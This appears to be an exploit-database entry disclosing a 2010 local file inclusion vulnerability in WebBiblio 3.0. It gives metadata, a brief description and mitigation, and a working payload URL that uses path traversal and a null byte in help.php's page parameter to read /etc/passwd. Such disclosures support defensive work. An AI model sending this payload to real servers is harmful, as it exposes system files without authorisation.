header-logo
Suggest Exploit
vendor:
WebBiblio
by:
AntiSecurity
8,8
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: WebBiblio
Affected Version From: WebBiblio version 3.0
Affected Version To: WebBiblio version 3.0
Patch Exists: YES
Related CWE: CVE-2010-2090
CPE: webbiblio
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2010

WebBiblio Subject Gateway System Local File Inclusion Vulnerability

WebBiblio Subject Gateway System is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to include arbitrary local files from the target server.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title:
WebBiblio Subject Gateway System Local File Inclusion Vulnerability

# Date:
June 06 2010

# Author:
AntiSecurity

# Software Link:
http://webbiblio.sourceforge.net/
http://sourceforge.net/projects/webbiblio/files/

# Version:
WebBiblio version 3.0

# Tested on:
Linux

# Target:
http://server/shared/help.php?page=../../../../../../../../../../../../../../../etc/passwd%00